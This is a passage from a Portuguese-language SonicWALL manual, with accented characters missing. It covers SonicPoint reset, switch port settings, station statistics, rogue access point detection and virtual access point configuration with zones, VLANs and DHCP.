Pressione o boto Redefinir por mais de oito segundos com o SonicPoint operando no
Modo gerenciado para redefinir a configurao de Modo gerenciado para os padres de
fbrica e reinicializar o SonicPoint.
Pressione o boto Redefinir por pelo menos trs segundos e menos de oito segundos
com o SonicPoint operando no Modo independente para redefinir a configurao de Modo
independente para os padres de fbrica e reinicializar o SonicPoint.
Pressione o boto Redefinir por mais de oito segundos com o SonicPoint operando no
Modo independente para redefinir a configurao de Modo independente para os padres
de fbrica e reinicializar o SonicPoint.

Dicas de programao do comutador
Comandos de comutao de amostra do HP ProCurve (por interface)
nome 'link para SonicPoint X'
no lacp
no cdp
potncia crtica
no power-pre-std-detect (nota: comando global)
speed-duplex 100-half (nota: apenas se estiver vendo erros FCS)
spanning-tree xx admin-edge-port (nota: substitua xx pelo nmero da porta)
mdix-mode mdix
Exemplo de configurao de comutador Dell (por interface)

spanning-tree portfast
no back-pressure
no channel-group
duplex half (nota: apenas se estiver vendo erros FCS)
speed 100
no flowcontrol
no gvrp enable
no lldp enable
mdix on
mdix auto
no port storm-control broadcast enable
Exemplo de configurao de comutador D-Link

As opes de comutadores PoE D-Link no tm uma CLI, portanto, ser necessrio usar sua
GUI da Web. Observe que a D-Link recomenda a atualizao para a Verso de Firmware
1.20.09 se voc estiver usando multicast em seu ambiente.

Desabilite o controle de rvore de abrangncia, difuso tempestade, LLDP e o Mecanismo de
proteo no comutador antes de adicionar SonicPoints ao comutador, pois todos podem afetar
o provisionamento bem-sucedido, configurao e funcionalidade.

Captulo 34
Visualizao do Status da Estao
SonicPoint > Status da Estao

A pgina SonicPoint > Status da Estao relata as estatsticas de cada SonicPoint.
.
A tabela lista entradas para cada cliente sem fio conectado a cada SonicPoint. As sees da
tabela so divididas por SonicPoint. Em cada SonicPoint, h uma lista de todos os clientes
atualmente conectados a ele.
Clique no boto Atualizar no canto superior esquerdo para atualizar a lista.
Por padro, a pgina exibe as primeiras 50 entradas encontradas. Clique nos cones Primeira
pgina , Pgina anterior , Prxima pgina e ltima pgina para navegar se voc
precisar visualizar mais de 50 entradas.
Visualizao do Status da Estao | 483

Clique no cone de Estatsticas para ver um relatrio detalhado de uma estao individual.
Cada dispositivo SonicPoint relata para ambas as rdios e para cada estao as seguintes
informaes ao seu SonicOS peer:
Endereo MAC endereo de hardware do cliente (Estao).

Status de Estao o estado da estao. Estados podem incluir:
Nenhum nenhuma informao de estado existe ainda para a estao.
Autenticado a estao foi autenticada com xito.
Associado a estao est associada.
Unido a estao ingressou no ESSID.
Conectado a estao est conectada (ingressada, autenticada ou associada).
Ativo um estado do Ponto de acesso, indica que o Ponto de acesso est ativo e em
execuo.
Inativo um estado de Ponto de acesso, indica que o Ponto de acesso no est em
execuo.
Associaes nmero total de associaes desde que ligado.
Associaes de Dis nmero total de associaes Dis.
Reassociaes nmero total de reassociaes.
Autenticaes nmero de autenticaes.
Cancelamento de Autenticaes nmero de autenticaes canceladas.
Bons quadros recebidos nmero total de bons quadros recebidos.
Bons quadros transmitidos nmero total de bons quadros transmitidos.
Erro ao receber quadros o nmero total de quadros de erro recebido.
Erro ao transmitir quadros o nmero total de quadros de erro transmitidos.
Quadros descartados nmero total de quadros descartados. Quadros descartados
geralmente so um sinal de congestionamento da rede.

Total de bytes recebidos nmero total de bytes recebidos.
Total de bytes transmitidos nmero total de bytes transmitidos.
Quadros de gerenciamento recebidos nmero total de quadros de gerenciamento
recebidos. Quadros de gerenciamento incluem:
Solicitao de associao
Resposta de associao
Solicitao de reassociao
Resposta de reassociao
Solicitao de investigao
Resposta da investigao
Quadro de sinalizador
Mensagem ATIM
Desassociao
Autenticao
Cancelamento de autenticao
Quadros de gerenciamento transmitidos nmero total de quadros de gerenciamento
transmitidos.
Quadros de controle recebidos nmero total de quadros de controle recebidos. Quadros
de controle incluem:
RTS solicitao para enviar
CTS limpar para enviar
ACK confirmao positiva
Quadros de controle transmitidos nmero total de quadros de controle transmitidos.
Quadros de dados recebidos nmero total de quadros de dados recebidos.
Quadros de dados transmitidos nmero total de quadros de dados transmitidos.
Visualizao do Status da Estao | 485

Captulo 35
Servios de deteco de intruso do
SonicPoint
SonicPoint > IDS

As seguintes sees descrevem os Servios de deteco de intruso do SonicPoint (IDS):
Verificando ponto de acesso na pgina 489
Pontos de acesso autorizados na pgina 490
Registro de eventos de Servios de deteco de intruso na pgina 491
Pontos de acesso invasores surgiram como uma das ameaas mais graves e traioeiras para
a segurana sem fio. Em termos gerais, um ponto de acesso considerado invasor quando
no autorizados para uso em uma rede. A convenincia, acessibilidade e disponibilidade de
pontos de acesso no-seguros e a facilidade com a qual eles podem ser adicionados a uma
rede cria um ambiente fcil para introduzir pontos de acesso invasores. Especificamente, a
verdadeira ameaa surge em um nmero de formas diferentes, incluindo conexes no
intencionais e involuntrias com o dispositivo no autorizado, a transmisso de dados
confidenciais por canais no seguros e acesso indesejado a recursos da LAN. Portanto,
embora isso no represente uma deficincia na segurana de um dispositivo sem fio
especfico, um ponto fraco para a segurana geral de redes sem fio.
Os Servios de Deteco de Intruses (IDS) aumentam significativamente os recursos de
segurana do firewall porque permite que o dispositivo reconhea e tome medidas defensivas
contra os tipos mais comuns de atividades ilcitas sem fio. Relatrios IDS sobre todos os
pontos de acesso que podem ser encontrados atravs da varredura de banda de rdio
802.11a, 802.11g e 802.11n no SonicPoints.
Servios de deteco de intruso do SonicPoint | 487

A pgina SonicPoint > IDS relata todos os pontos de acesso detectados pelo firewall e seus
SonicPoints associados e fornece a capacidade de autorizar pontos de acesso legtimos.
A tabela a seguir descreve a tabela de Pontos de acesso descobertos e entidades que so

exibidas na pgina SonicPoint > IDS.
Tabela 1 Pgina SonicPoints IDS
Tabela Coluna ou Entidade Descrio

Entidade
Navegao de pgina Permite que voc navegue rapidamente para a pgina seguinte
ou anterior. Voc pode digitar um valor para passar entradas
grandes. Por exemplo, se voc tiver 10 pginas, voc pode
inserir 7 no campo de texto Itens para visualizar a pgina 7.
Boto Atualizar Atualiza a tela para exibir a lista de pontos de acesso mais
atual na sua rede.
Boto Sondar tudo... Inicia uma varredura de todas as operaes para identificar
Tabela de Pontos de acesso descobertos
Estilo de visualizao: SonicPoint: Se voc tiver mais de um SonicPoint, pode selecionar um
Suspenso dispositivo individual na lista SonicPoint para limitar a tabela de
Pontos de acesso descobertos para exibir apenas os
resultados de verificao de tal SonicPoint. Selecione todos os
SonicPoints para exibir os resultados de varredura de todos os
SonicPoints.
Configuraes Disponvel quando Todos os SonicPoints selecionado no
menu suspenso Estilo de visualizao.
O SonicPoint que detectou o ponto de acesso.
Endereo MAC (BSSID) O endereo MAC da interface de rdio do ponto de acesso
detectado.
SSID O SSID de rdio do ponto de acesso.

Tabela Coluna ou Entidade Descrio
Tipo O intervalo de faixas de rdio usado pelo ponto de acesso, 2,4
GHz ou 5 GHz.
Canal O canal de rdio usado pelo ponto de acesso.
Autenticao O tipo de autenticao.
Criptografia O modo de criptografia.
Fabricante O fabricante do ponto de acesso.
Intensidade do sinal A intensidade do sinal do rdio detectado.
Taxa mxima A taxa de dados permitida mais rpida para o rdio do ponto de
acesso, normalmente 54 Mbps.
Autorizar Quando voc clica no cone Editar, o ponto de acesso
adicionado ao grupo de objeto de endereo dos pontos de
acesso autorizados.
Verificando ponto de acesso

A varredura ativa ocorre quando o dispositivo de segurana iniciado. Voc tambm pode
verificar o ponto de acesso a qualquer momento clicando em Verificar tudo... na pgina
SonicPoint > IDS. Quando o dispositivo de segurana executa uma verificao, os clientes
sem fio sero interrompidos por alguns segundos. A verificao afetar o trfego nas seguintes
formas:
Protocolos no-persistentes e sem monitorao (como HTTP) no devem apresentar
efeitos problemticos.
Conexes persistentes (protocolos como FTP) so comprometidas ou danificadas.
As conexes WiFiSec devem estabelecer novamente e continuar sem interrupo
perceptvel para o cliente automaticamente.
Cuidado Clicar em Verificar tudo far com que todos os clientes sem fio ativos sejam desconectados
enquanto a verificao executada. Se a interrupo do servio uma preocupao,
recomendvel no clicar em Verificar agora enquanto o Dispositivo de segurana
SonicWALL estiver no modo de Ponto de acesso. Aguarde at que no haja nenhum cliente
ativo ou uma breve interrupo do servio seja aceitvel.
Voc tambm pode verificar em uma base de SonicPoint por SonicPoint, da seguinte maneira:
Etapa 1 Selecione o SonicPoint para visualizar no SonicPoint: suspenso.

Etapa 2 Role para o fim da pgina. No canto inferior direito, clique na seta do menu suspenso para --
Executar verificao do SonicPoint--.

Figura 1
Nota Dependendo de qual modelo SonicPoint voc estiver usando, as seguintes opes podem
ser exibidas.
Verificar ambas as rdios

Verificar rdio 802.11a (5 GHz)
Verificar rdio 802.11g (2,4 GHz)
Verificar rdio 802.11n (5 GHz)
Verificar rdio 802.11n (2,4 GHz)
Pontos de acesso autorizados

Pontos de Acesso que o dispositivo de segurana detecta so considerados como pontos de
acesso invasores at que o dispositivo de segurana esteja configurado para autoriz-los para
a operao. Para autorizar um ponto de acesso, execute as seguintes etapas:
Etapa 1 Clique no cone Editar na coluna Autorizar para o ponto de acesso que voc deseja autorizar.
Um pop-up exibido.
Figura 2 Pop-up de confirmao de Pontos de acesso autorizados

Voc pode verificar que a autorizao teve xito ao verificar que o objeto de endereo foi
criado. Navegue at a pgina Firewall > Objetos de endereo. Clique no cone Configurar
em Todos os pontos de acesso autorizados e verifique se o endereo MAC do ponto de
acesso foi adicionado.

Figura 3 Janela Editar grupo de objetos de endereo
Registro de eventos de Servios de deteco de intruso

Para habilitar as notificaes e o registro de eventos IDS, execute as seguintes etapas:
Etapa 1 Navegue at a pgina Painel > Monitor de log.

Etapa 2 Clique na guia Categorias.
Etapa 3 Clique na linha Sem fio na tabela para expandi-la e, em seguida, clique em IDS de WLAN.
Etapa 4 Modificar as configuraes de alerta para qualquer uma das categorias de registro a seguir de
IDS de WLAN:
Verificao de investigao WLAN

AP de invasor passivo de WLAN
Inundao de associao de WLAN
Verificao de sequncia WLAN
AP de invasor encontrado

Captulo 36
Configurando pontos de acesso virtuais
SonicPoint > Ponto de acesso virtual

Esta seo descreve o recurso de Ponto de acesso virtual e inclui as seguintes sees:
Viso geral do SonicPoint VAP na pgina 493
Restries de implantao na pgina 497
Lista de tarefas de configurao de AP Virtual do SonicPoint na pgina 497
Pensando de forma crtica sobre VAPs na pgina 509
Configuraes de amostra VAP na pgina 512
Viso geral do SonicPoint VAP

Esta seo fornece uma apresentao do recurso de Ponto de acesso virtual.
Nota Os Pontos de acesso virtuais so suportados ao usar pontos de acesso sem fio SonicPoint
com dispositivos SonicWALL NSA.

O que um ponto de acesso virtual? na pgina 493
O que um SSID? na pgina 495
Roaming sem fio com ESSID na pgina 495
O que um BSSID? na pgina 495
Benefcios do uso de pontos de acesso virtual na pgina 496
Benefcios do uso de pontos de acesso virtual com VLANs na pgina 496
O que um ponto de acesso virtual?

Um Ponto de acesso virtual uma instanciao multiplexada de um nico Ponto de acesso
(PA) fsico para que ele se apresente como vrios Pontos de acesso discretos. Para clientes
LAN sem fio, cada ponto de acesso virtual parece ser um ponto de acesso fsico independente,
quando, na verdade, h apenas um nico AP fsico. Antes da evoluo do suporte do recurso
Configurando pontos de acesso virtuais | 493

de AP Virtual, as redes sem fio eram relegadas a um relacionamento individual entre Pontos
de acesso fsico e caractersticas de segurana de rede sem fio, como criptografia e
autenticao. Em outras palavras, um Ponto de acesso fornecendo segurana WPA-PSK no
pode oferecer simultaneamente conectividade Aberta ou WPA-EAP aos clientes e, se a ltima
for necessria, elas teriam que ser fornecidas em um Ponto de acesso configurado distinto e
separado. Isso forou os administradores de rede WLAN a encontrarem uma soluo para
dimensionar sua infraestrutura LAN sem fio existente para fornecer nveis diferenciados de
servio. Com o recurso de pontos de acesso virtuais (VAP), vrios VAPs podem existir dentro
de um nico AP fsico em conformidade com o padro IEEE802.11 para a camada de protocolo
de controle de acesso de mdia (MAC), que inclui um Basic Set Service Identifier (BSSID) e um
Service Set Identified (SSID). Isso permite segmentar servios de rede sem fio em uma base
de radiofrequncia nica de um dispositivo de ponto de acesso fsico nico.
Os VAPs permitem que o administrador da rede controle as configuraes de acesso e
segurana do usurio sem fio, definindo vrias configuraes personalizadas em uma nica
interface fsica. Cada uma dessas configuraes personalizadas atua como um ponto de
acesso (virtual) separado e pode ser agrupada e aplicada em um ou vrios pontos de acesso
SonicPoint fsicos simultaneamente.
Internet
RADIUS
Server
VLAN 50 - SSID: VAP-Corporate
VLAN 100 - SSID: VAP-Legacy
VLAN 150 - SSID: VAP-Guest_Secure
VLAN 200 - SSID: VAP-Guest
VLAN 250 - SSID: VAP-SSL-VPN
VLAN IDs
Provisioned to SonicPoints
SSID: SSID: SSID:
VAP-Guest VAP-Corporate VAP-SSL-VPN
Guest User Corporate User SSL-VPN User
SSID: SSID: SSID:

VAP-Guest VAP-Guest VAP-Legacy
Secure
WGS WPA / WPA2 Open
No Encryption WiFiSec Enforced SSL-VPN Enforced
Guest User Trusted Guest Wireless Printer No LAN Access LAN Access LAN Access
Ethernet LAN
LAN with Multiple VLAN
WGS WPA - PSK WEP Individual WLAN SSID
No Encryption WiFiSec Enforced MAC Filtering
No LAN Access LAN Access LAN Access

Para obter mais informaes sobre os recursos da Rede sem fio segura do SonicOS, consulte
o Guia de Solues Integradas da Rede sem Fio Segura SonicWALL.
O que um SSID?
Um Service Set Identifier (SSID) o nome atribudo a uma rede sem fio. Os clientes sem fio
devem usar este mesmo SSID, que diferencia maisculas de minsculas, para se comunicar
com o SonicPoint. O SSID consiste de uma sequncia de texto de at 32 bytes de
comprimento. Vrios SonicPoints em uma rede podem usar os mesmos SSIDs. Voc pode
configurar at oito SSIDs exclusivos em SonicPoints e atribuir diferentes configuraes para
cada SSID.
Os SonicPoints transmitem um beacon (anncios de disponibilidade de uma rede sem fio) para
a cada SSID configurado. Por padro, o SSID includo no beacon para que os clientes sem
fio possam ver as redes sem fio. A opo para suprimir o SSID no beacon fornecida em uma
base por SSID (por exemplo, por VAP ou por PA) para ajudar a ocultar a presena de uma rede
sem fio enquanto ainda permite que os clientes se conectem especificando manualmente o
SSID.
As configuraes a seguir podem ser atribudas a cada VAP:
Mtodo de autenticao
VLAN
Nmero mximo de associaes de cliente usando o SSID
Supresso de SSID
Roaming sem fio com ESSID

Um ESSID (Extended Service Set IDentifier) uma coleo de Pontos de acesso (ou Pontos
de acesso virtuais) compartilhando o mesmo SSID. Uma rede sem fio tpica consiste em mais
de um PA para que abranja reas geogrficas maiores, que podem ser atendidas por um nico
ponto de acesso. Conforme os clientes se movem pela rede sem fio, a intensidade do sinal da
sua conexo sem fio diminui medida que eles se movem para longe de um Ponto de acesso
(AP1) e aumenta conforme eles se movem em direo a outro (AP2). Uma vez que o AP1 e
AP2 esto no mesmo ESSID (por exemplo, 'sonicwall') e que os pontos de acesso (V)
compartilham o mesmo SSID e configuraes de segurana, o cliente ser capaz de se
deslocar de um para o outro. Esse processo de roaming controlado pelo hardware de cliente
sem fio e o driver, portanto, o comportamento de roaming pode diferir de um cliente para o
outro, mas geralmente dependente da intensidade do sinal de cada ponto de acesso em um
ESSID.
O que um BSSID?
Um BSSID (Basic Service Set IDentifier) o equivalente sem fio de um endereo MAC
(Controle de Acesso de Mdia) ou um endereo de hardware exclusivo de um ponto de acesso
ou VAP para fins de identificao. Continuando o exemplo do cliente sem fio mvel da seo
ESSID acima, conforme o cliente no ESSID 'sonicwall' se move do AP1 em direo ao AP2, a
intensidade do sinal do primeiro diminuir enquanto o do segundo aumenta. Uma placa sem
fio e o driver do cliente monitoram constantemente esses nveis, diferenciando entre os pontos
de acesso (V) pelo BSSID. Quando os critrios do carto/driver para roaming forem atendidos,
o cliente ir desanexar o BSSID de AP1 e anexar o BSSID ou AP2 durante todo o tempo
restante conectado ao ESSID 'sonicwall'.

Benefcios do uso de pontos de acesso virtual
Esta seo inclui uma lista de benefcios do uso do recurso de PA Virtual:
Conservar de canal de rdio Impede a criao de infraestruturas sobrepostas,
permitindo que um nico de Ponto de acesso fsico seja usado para diversos fins para
evitar o problema de conflito de canal. Conservao do canal. Vrios provedores esto se
tornando a norma dentro de espaos pblicos, como aeroportos. Dentro de um aeroporto,
talvez seja necessrio oferecer suporte a uma rede FAA, uma ou mais redes areas e
talvez um ou mais ISPs sem fio. No entanto, nos EUA e Europa, redes 802.11b suportam
apenas trs canais utilizveis (no sobrepostos) e, na Frana e no Japo, apenas um canal
est disponvel. Assim que os canais so utilizados por PAS existentes, PAS adicionais
interferem entre si e reduzem o desempenho. Ao permitir uma nica rede a ser usada para
diversos fins, os pontos de acesso virtual conservam os canais.
Otimizar a Infraestrutura LAN do SonicPoint LAN Compartilha a mesma
infraestrutura LAN do SonicPoint entre vrios provedores em vez de criar uma
infraestrutura sobreposta, para reduzir as despesas de capital inativo para instalao e
manuteno de WLANs.
Benefcios do uso de pontos de acesso virtual com VLANs

Embora a implementao de VAPs no requeira o uso de VLANs, o uso de VLAN fornece
benefcios de diferenciao de trfego prticos. Quando no se est usando VLANs, o trfego
de cada VAP tratado por uma interface comum do dispositivo de segurana. Isso significa
que todo o trfego de cada VAP pertencer mesma zona e mesma sub-rede (nota de rodap:
uma verso futura do SonicOS Enhanced permitir a existncia do trfego de VAPs diferentes
em sub-redes diferentes na mesma zona, fornecendo uma medida de diferenciao de trfego
mesmo sem marcao de VLAN). Ao marcar o trfego de cada VAP com uma ID de VLAN
exclusiva e criar as sub-interfaces correspondentes no dispositivo de segurana, possvel
que cada VAP ocupe uma sub-rede exclusiva e atribua cada sub-interface sua prpria zona.
Isso permite os seguintes benefcios:
Cada VAP pode ter suas prprias configuraes de servios de segurana (por exemplo,
GAV, IPS, CFS, etc.).
O trfego de cada VAP pode ser controlado facilmente usando as Regras de acesso
configuradas no nvel de zona.
Configuraes separadas de Servios para convidados ou Sistema de mensagens
Lightweight Hotspot (LHM) podem ser aplicadas a cada um, facilitando a apresentao de
vrios provedores de servios de convidado com um conjunto comum de hardware do
SonicPoint.
O gerenciamento de largura de banda e outros controles com base em Regra de acesso
podem facilmente ser aplicadas.
Pr-requisitos
Cada SonicPoint SonicWALL deve ser explicitamente ativado para suporte de Ponto de
acesso virtual ao selecionar SonicPoint > SonicPoints > guia de Configuraes gerais:
Marcar a caixa de seleo "Habilitar SonicPoint" na interface de gerenciamento do
SonicOS e permitir Rdio A ou G.
Os SonicPoints devem ser vinculados a uma zona WLAN no seu dispositivo SonicWALL
UTM para que o provisionamento de APs ocorra.

Ao usar VAPs com VLANs, voc deve garantir que os pacotes de descoberta e
provisionamento do SonicPoint fsico permanecem no marcados (a menos que sejam
encerrados originalmente em uma sub-interface VLAN no firewall). Voc tambm deve
garantir que pacotes VAP marcados como VLAN pelo SonicPoint so entregues
inalterados (nem encapsulados, nem duplamente encapsulados) por qualquer
equipamento intermedirio, como um switch para VLAN, na rede.
Restries de implantao
Ao configurar seu programa de instalao VAP, esteja ciente das restries de implantao a
seguir:
As restries de SonicPoint mximas se aplicam e diferem com base em seu dispositivo
de segurana SonicWALL. Revise essas restries no Configuraes VLAN
personalizadas na pgina 505.
Lista de tarefas de configurao de AP Virtual do SonicPoint

Uma implantao de VAP do SonicPoint requer vrias etapas para configurar. A seo seguinte
fornece uma breve viso geral das etapas envolvidas e, em seguida, uma anlise mais
profunda das partes que fazem parte de uma implantao bem-sucedida do VAP. Essas sees
subsequentes descrevem os requisitos de implantao de VAP e fornecem uma lista de tarefas
de configurao de administrador:
Viso geral de configurao SonicPoint VAP na pgina 498
Zonas de rede na pgina 500
Sub-interfaces de VLAN na pgina 504
Configuraes do servidor DHCP na pgina 505
Perfil de provisionamento do Sonic Point na pgina 509
Pensando de forma crtica sobre VAPs na pgina 509
Implantao de VAPs em um SonicPoint na pgina 525

Viso geral de configurao SonicPoint VAP
O seguinte so reas de configurao necessrias para a implantao de VAP:
Etapa 1 Zona - A zona a espinha dorsal da configurao do VAP. Cada zona que voc criar ter sua
prpria segurana e configuraes de controle de acesso, e voc pode criar e aplicar vrias
zonas a uma nica interface fsica por meio de sub-interfaces VLAN.
Etapa 2 Interface (ou Sub-interface VLAN) - A interface (x2, x3, etc...) representa a conexo fsica
entre o seu dispositivo SonicWALL UTM e seu SonicPoint. As configuraes da zona
individuais so aplicadas a essas interfaces e, em seguida, encaminhadas ao SonicPoints.
Etapa 3 Servidor DHCP - O servidor DHCP atribui endereos IP concedidos aos usurios nos
intervalos especificados, conhecidos como "Escopos". Os intervalos padro para escopos
DHCP so frequentemente excessivos para as necessidades da maioria das implantaes
SonicPoint, por exemplo, um escopo de 200 endereos para uma interface que usar somente
30. Por isso, os intervalos de DHCP devem ser definidos com ateno para garantir que o
escopo de concesso disponvel no esteja esgotado.
Etapa 4 Perfil VAP - O recurso de Perfil de VAP permite a criao de perfis de configurao do
SonicPoint que podem ser facilmente aplicados a novos Pontos de acesso virtuais SonicPoint
conforme necessrio.
Etapa 5 Objetos VAP - O recurso de Objetos VAP permite a instalao de configuraes gerais do VAP.
A ID de SSID e VLAN so configuradas por meio das Configuraes VAP.
Etapa 6 Grupos VAP - O recurso de Grupo VAP permite o agrupamento de vrios objetos VAP
simultaneamente para que sejam aplicados ao seu SonicPoint(s).
Etapa 7 Atribuir Grupo de VAP ao Rdio de Perfil de provisionamento do SonicPoint- o Perfil de
provisionamento permite que um Grupo de VAP seja aplicado a novos SonicPoints conforme
so provisionados.

Etapa 8 Atribuir chave WEP (somente para criptografia WEP) - Atribuir chave WEP permite que a
Chave de criptografia WEP seja aplicado a novos SonicPoints conforme so provisionados. As
chaves WEP so configuradas por SonicPoint, que significa que qualquer VAP ativado por
WEP atribudo a um SonicPoint deve usar o mesmo conjunto de chaves WEP. At 4 chaves
podem ser definidas por SonicPoint, e VAPs com WEP ativado podem usar essas 4 chaves de
modo independente. As chaves WEP so configuradas em SonicPoints individuais ou Perfis
do SonicPoint da pgina SonicPoint > SonicPoints.
Network Configuration
Zone Corporate Zone Legacy Zone Guest Zone
DHCP Scopes DHCP Lease Scope DHCP Lease Scope DHCP Lease Scope
10.10.50.1 - 10.10.50.100 10.10.100.1 - 10.10.100.10 10.10.200.1 - 10.10.200.25
VLANs VLAN 50 VLAN 100 VLAN 200
VAP Configuration
VAP Profiles WPA2 WEP Open
VAP Objects Corporate VAP Legacy VAP Guest VAP
Master VAP Group
SonicPoint Profile

Zonas de rede
A zona sem fio na pgina 500
Configuraes da zona sem fio personalizada na pgina 500
Uma zona de segurana de rede um mtodo lgico de uma ou mais interfaces com nomes
amigveis e configurveis pelo usurio e a aplicao de regras de segurana medida que o
trfego passa de uma zona para outra zona. Com a segurana baseada em zonas, o
administrador pode agrupar interfaces semelhantes e aplicar as mesmas regras a elas em vez
de gravar a mesma diretiva para cada interface. As zonas de rede so configuradas na pgina
Rede > Zonas.
Para obter informaes detalhadas sobre como configurar zonas, consulte Configurar zonas
de rede na pgina 263.
A zona sem fio

O tipo de zona Sem fio, em que "Zona WLAN" a instncia padro, oferece suporte para
SonicWALL SonicPoints. Quando uma interface ou sub-interface atribuda a uma zona sem
fio, a interface pode descobrir e fornecer SonicPoints conectados Camada 2 e aplicar
configuraes de segurana acima da camada 802.11, incluindo a Imposio de WiFiSec,
redirecionamento de VPN SSL, Servios para convidados, Sistema de mensagens Lightweight
Hotspot e todos os servios de segurana de Inspeo profunda de pacotes licenciados.
Nota Os SonicPoints s podem ser gerenciados usando pacotes no-marcados e no-

VLAN. Ao configurar o WLAN, certifique-se de que os pacotes enviados para os
SonicPoints so VLAN no marcados.
Configuraes da zona sem fio personalizada

Embora o SonicWALL fornea a zona Sem fio previamente configurada, os administradores
tambm tm a capacidade de criar suas prprias zonas sem fio personalizadas. Ao usar VAPs,
vrias zonas personalizadas podem ser aplicadas a um nico ou vrios pontos de acesso
SonicPoint. As trs sees a seguir descrevem as configuraes de zonas sem fio
personalizadas:
Geral na pgina 501
Sem fio na pgina 502
Servios para convidados na pgina 503

Geral
Limitao Descrio
Nome Criar um nome para a sua zona personalizada
Tipo de segurana Selecionar Sem fio para habilitar e acessar as opes de segurana sem fio.
Permitir confiana na Selecione esta opo para criar automaticamente regras de acesso que
interface permitem o fluxo de trfego entre as interfaces de uma zona. Isso efetivamente
permitir que os usurios em uma zona sem fio se comuniquem uns com os
outros. Esta opo est desabilitada com frequncia ao configurar os Servios
para convidados.
SonicWALL Security Selecione os servios de segurana que deseja para impor nessa zona. Isso
Services permite que voc amplie os servios de segurana SonicWALL UTM para seu
SonicPoints.

Sem fio
Limitao Descrio
Apenas permitir trfego Restringe o trfego nesta zona para somente trfego gerado pelo
gerado por um SonicPoint.
SonicPoint
Imposio de VPN SSL Redireciona todo o trfego entrando na zona Sem fio para um dispositivo
SonicWALL VPN SSL definido. Isso permite que todo o trfego sem fio seja
autenticado e criptografado por VPN SSL, usando, por exemplo,
NetExtender para todo o trfego de tnel. Nota: O trfego sem fio que
encaminhado em um VPN SSL ser exibido para se originar do VPN SSL
em vez da zona sem fio.
Servidor VPN SSL - Selecione o Objeto de endereo que representa o
dispositivo VPN SSL para o qual voc deseja redirecionar o trfego sem fio.
Imposio de WiFiSec Exige que todo o trfego seja IPsec ou WPA. Com essa opo marcada,
todas as conexes de no convidados devem ser impostas ao IPsec.
Servio de exceo de WiFiSec - Selecione os servios que deseja isentar
da Imposio de WiFiSec.
Exige WiFiSec para Para uso com a imposio de WiFiSec, requer segurana WiFiSec em todas
travessia de tnel VPN as conexes de VPN site-to-site por meio desta zona.
entre locais
Confiar no trfego WPA/ Permite que WPA ou WPA2 seja usado como uma alternativa para WiFiSec.
WPA2 como WiFiSec
Perfil de provisionamento Selecione um Perfil de Provisionamento do SonicPoint predefinido a ser
do SonicPoint aplicado a todos os SonicPoints atuais e futuros nesta zona.

Servios para convidados
A opo Habilitar servios para convidados permite que os seguintes servios para
convidados sejam aplicados a uma zona:
Limitao Descrio
Habilitar comunicao Permite que os convidados conectados ao SonicPoints nesta zona Sem fio se
entre convidados comuniquem diretamente e sem fio entre eles.
Ignorar verificao de AV Permite ao trfego de convidados ignorar a proteo antivrus
para convidados
Habilitar converso A Converso de Endereo Dinmico (DAT) permite que o SonicPoint oferea
dinmica de endereos suporte a qualquer esquema de endereamento de IP para os usurios dos
(DAT) Servios para convidados.
Se essa opo est desativada (desmarcada), os usurios convidados sem fio
devem ter o DHCP habilitado ou um esquema de endereamento de IP
compatvel com as configuraes de rede do SonicPoint.
Habilitar autenticao de Requer que os convidados conectando a partir do dispositivo ou rede
convidado externo selecionado por voc se autentiquem antes de ganhar acesso. Esse recurso,
com base em Sistema de mensagens Lightweight Hotspot (LHM), usado para
autenticar usurios de ponto de acesso e fornec-las com acesso de rede
vinculado de forma paramtrica.
Pgina de autenticao Redireciona os usurios a uma pgina de autenticao personalizada quando
personalizada estes se conectam primeiro a um SonicPoint na zona sem fio. Clique em
Configurar para configurar a pgina de autenticao personalizada. Insira um
URL para uma pgina de autenticao ou uma instruo de desafio
personalizada no campo de texto e clique em OK.
Pgina de ps- Direciona os usurios para a pgina especificada imediatamente aps
autenticao autenticao com xito. Insira um URL para a pgina de ps-autenticao no
campo.

Limitao Descrio
Ignorar autenticao de Permite que um SonicPoint executando os Servios para convidados integre-se
convidados em ambientes que j usam alguma forma de autenticao de nvel de usurio.
Esse recurso automatiza o processo de autenticao dos Servios para
convidados, permitindo que os usurios sem fio acessem os recursos dos
Servios para convidados sem precisar de autenticao. Este recurso s deve
ser usado quando o acesso irrestrito aos Servios para convidados for desejado
ou quando outro dispositivo de upstream do SonicPoint for aplicar a
autenticao.
Redirecionar trfego Redireciona a entrada de trfego SMTP nesta zona para um servidor SMTP
SMTP para especificado. Selecione o objeto de endereo para redirecionar o trfego.
Negar redes Bloqueia o trfego das redes que voc especificar. Selecione a sub-rede, o
grupo de endereo ou endereo IP para bloquear o trfego.
Aprovar redes Permite automaticamente o trfego por meio da zona Sem fio das redes que
voc selecionar.
Mximo de convidados Especifica o nmero mximo de convidados com permisso para se
conectarem zona sem fio. O padro 10.
Sub-interfaces de VLAN
Uma Rede de rea Local Virtual (VLAN) permite que voc divida suas conexes de rede fsica
(X2, X3, etc...) em muitas conexo de rede virtuais, cada uma executando seu prprio conjunto
de configuraes. A soluo VLAN permite que cada VAP tenha sua prpria sub-interface
separada em uma interface fsica real.
Sub-interfaces VLAN tm a maioria dos recursos e caractersticas de uma interface fsica,
incluindo atribuio de zona, servios de segurana, atribuio de WAN (somente
endereamento esttico), GroupVPN, servidor DHCP, Auxiliar de IP, roteamento e poltica NAT
completa e controles de Regra de acesso. Recursos excludos das sub-interfaces VLAN no
momento so a ligao de poltica VPN, o suporte ao cliente dinmico WAN e suporte difuso
seletiva.
As sub-interfaces VLAN so configuradas na pgina Rede > Interfaces.

Configuraes VLAN personalizadas
A tabela abaixo lista os parmetros de configurao e as descries de sub-interfaces VLAN:
Limitao Descrio
Zona Selecione uma zona para herdar as configuraes de zona de uma zona
predefinida ou personalizada definidas pelo usurio.
Marca VLAN Especificar a ID de VLAN para esta sub-interface.
Interface pai Selecione uma interface fsica pai (x2, x3, etc...) para o VLAN.
Configurao de IP Criar um endereo IP e Mscara de sub-rede de acordo com a sua
configurao de rede.
Limite do Sonic Point Selecione o nmero mximo de SonicPoints a ser usado nesta
interface. Abaixo est o nmero mximo de SonicPoints por interface,
com base no seu hardware SonicWall UTM:
Protocolos de gerenciamento Selecione os protocolos que deseja usar ao gerenciar esta interface.
Protocolos de login Selecione os protocolos que sero disponibilizados aos clientes que
acessam esta sub-interface.
Configuraes do servidor DHCP

O servidor DHCP atribui endereos IP concedidos aos usurios nos intervalos especificados,
conhecidos como "Escopos". Os intervalos padro para escopos DHCP so frequentemente
excessivos para as necessidades da maioria das implantaes SonicPoint, por exemplo, um
escopo de 200 endereos para uma interface que usar somente 30. Por isso, os intervalos de
